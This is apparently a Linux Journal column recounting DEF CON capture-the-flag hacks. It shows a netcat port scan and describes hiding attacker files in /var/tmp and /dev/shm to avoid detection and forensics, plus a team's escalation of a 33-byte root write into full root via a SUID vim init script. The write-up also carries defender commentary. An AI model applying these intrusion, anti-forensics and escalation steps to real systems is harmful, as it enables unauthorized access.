Hack and / - Some Hacks from DEF CON
Another incredibly useful function of nc is as a port scanner when something more sophisticated isn't around. Just use the -z option to have nc test only whether a port is open instead of connecting to it, add -v for verbose output, and provide a port range as arguments. So to scan a host for open ports between 20 and 25 (good for testing for open FTP, telnet, SSH and SMTP services), you would type:
$ nc -zv host.example.org 20-25 nc: connect to host.example.org port 20 (tcp) failed: ↪Connection refused Connection to host.example.org 21 port [tcp/ftp] succeeded! Connection to host.example.org 22 port [tcp/ssh] succeeded! nc: connect to host.example.org port 23 (tcp) failed: ↪Connection refused nc: connect to host.example.org port 24 (tcp) failed: ↪Connection refused Connection to host.example.org 25 port [tcp/smtp] succeeded!
Another interesting point at the competition involved a system in which you could log in, however, a number of directories, including the home directory, were mounted over NFS read-only. This presented an interesting set of limitations. For instance, because the machine was being attacked by multiple teams who each could log in as the same user, everyone was kicking each other off the machine. This meant every time you wanted to log in, you had to type in the password manually, yet because the home directory was read-only, you couldn't automate the process with SSH keys. It also meant you needed to be creative with where you stored your scripts, as you couldn't write to the main directory to which your user normally had access.
For the defender, you can see why mounting secure directories as read-only over NFS presents a problem for attackers—attackers can't write to the directory as users, and also even if they become root, they also might have to exploit the NFS server to remount the filesystem in read-write mode. As an attacker, that just meant you needed to be a bit more creative with where you store your files.
Most command-line users are aware of the existence of the /tmp directory on a Linux system. This is a directory to which all users can write, and special permissions are set on the directory so that although anyone can write to files there, once a file is created, other users can't access it. When hacking this particular restricted system, you could very well store your scripts in /tmp, but that's the first place other teams would notice your files and would likely delete them (bad) or modify them to do something you didn't expect (worse). Luckily, there are at least two other less-well-known directories on a Linux system that are writable by everyone: /var/tmp and /dev/shm.
The /var/tmp directory serves much the same function as /tmp does in that all users and programs can write to it; however, unlike the /tmp directory, many users are unaware that it exists or forget to look there. Also unlike the /tmp directory, which gets erased when the system reboots, any files you put in /var/tmp persist between reboots.
The /dev/shm directory is also a hacker favorite and for good reason—it's even less well-known among administrators that it's world-writable. An even better reason than that for an attacker to use this directory is that its contents actually are stored only in RAM, not on a disk, so once the system reboots, the files are gone and not even forensics techniques can recover them.
At a particular point in the competition, some smart hackers on the neg9 team discovered a fault in a custom service running as root on one of the competition systems. They were able to turn this flaw into a root exploit that allowed them to write 33 bytes as root anywhere on the filesystem they wanted. The tricky part was that if they chose an existing file, it would be truncated with those 33 bytes.
This presents an interesting problem. If your only root access was the ability to write 33 bytes to a file, how would you convert that into full root access? You might, for instance, write a new file into /etc/cron.d/ that executes an exploit script every minute. What would you do though if that doesn't work? When you put yourself in an offensive mindset in a restricted environment like that, you end up discovering creative ways to approach a system.
There were a few ways you could exploit this option to get full root access. You could, for instance, look in /etc/inittab to see what getty process was set to auto-respawn and then replace the existing getty (for instance, /sbin/agetty) with your custom 33-byte shell code. Then, when getty respawns (which you potentially could force), it would respawn as root, and you'd have your custom code running with root permissions.
The way the team exploited the flaw was to write a new short init script that made vim SUID root. Then, they wrote to a file in /proc that forced the system to reboot, so that upon the reboot, their init script would run. With vim set to SUID root, they could edit root-owned files and do things like change root's password and enable root logins with SSH and finally undo the SUID permissions on vim. From a defender's point of view, this kind of attack is quite tricky to protect against and essentially comes down to basic security practices, such as keeping packages up to date and putting services in sandboxes when possible.
All in all, I have to say, I rather enjoyed this different perspective on security. Whether you are a sysadmin who stays on the defensive side or a hacker who thinks in offensive terms, I think both sides can benefit from putting on the other's hat every now and then.
Kyle Rankin is a Systems Architect in the San Francisco Bay Area and the author of a number of books, including The Official Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks. He is currently the president of the North Bay Linux Users' Group.
Kyle Rankin is a systems architect; and the author of DevOps Troubleshooting, The Official Ubuntu Server Book, Knoppix Hacks, Knoppix Pocket Reference, Linux Multimedia Hacks, and Ubuntu Hacks.
|Designing Electronics with Linux||May 22, 2013|
|Dynamic DNS—an Object Lesson in Problem Solving||May 21, 2013|
|Using Salt Stack and Vagrant for Drupal Development||May 20, 2013|
|Making Linux and Android Get Along (It's Not as Hard as It Sounds)||May 16, 2013|
|Drupal Is a Framework: Why Everyone Needs to Understand This||May 15, 2013|
|Home, My Backup Data Center||May 13, 2013|
- New Products
- Linux Systems Administrator
- Senior Perl Developer
- Technical Support Rep
- UX Designer
- Designing Electronics with Linux
- Dynamic DNS—an Object Lesson in Problem Solving
- Using Salt Stack and Vagrant for Drupal Development
- Making Linux and Android Get Along (It's Not as Hard as It Sounds)
- Nice article, thanks for the
3 hours 43 min ago
- I once had a better way I
9 hours 29 min ago
- Not only you I too assumed
9 hours 47 min ago
- another very interesting
11 hours 40 min ago
- Reply to comment | Linux Journal
13 hours 33 min ago
- Reply to comment | Linux Journal
20 hours 27 min ago
- Reply to comment | Linux Journal
20 hours 43 min ago
- Favorite (and easily brute-forced) pw's
22 hours 35 min ago
- Have you tried Boxen? It's a
1 day 4 hours ago
- seo services in india
1 day 8 hours ago
Free Webinar: Hadoop
How to Build an Optimal Hadoop Cluster to Store and Maintain Unlimited Amounts of Data Using Microservers
Realizing the promise of Apache® Hadoop® requires the effective deployment of compute, memory, storage and networking to achieve optimal results. With its flexibility and multitude of options, it is easy to over or under provision the server infrastructure, resulting in poor performance and high TCO. Join us for an in depth, technical discussion with industry experts from leading Hadoop and server companies who will provide insights into the key considerations for designing and deploying an optimal Hadoop cluster.
Some of key questions to be discussed are:
- What is the “typical” Hadoop cluster and what should be installed on the different machine types?
- Why should you consider the typical workload patterns when making your hardware decisions?
- Are all microservers created equal for Hadoop deployments?
- How do I plan for expansion if I require more compute, memory, storage or networking?